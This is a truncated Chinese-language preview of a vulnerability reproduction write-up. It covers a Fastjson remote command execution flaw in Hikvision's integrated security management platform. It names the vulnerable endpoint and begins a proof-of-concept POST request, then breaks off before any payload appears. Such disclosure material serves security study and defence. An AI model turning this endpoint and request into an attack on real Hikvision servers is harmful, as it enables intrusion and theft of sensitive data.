文章预览
网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 海康威视部分综合安防管理平台 管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。 该平台存在 Fastjson 远程命令执行漏洞,攻击者可通过构造恶意Payload执行并获取服务器系统权限以及敏感数据信息。 0x02影响版本 HIKVISION-综合安防管理平台 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现 Poc (POST) POST /bic/ssoService/v1/keepAlive HTTP/1.1 Content-Type : application/json User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0
………………………………
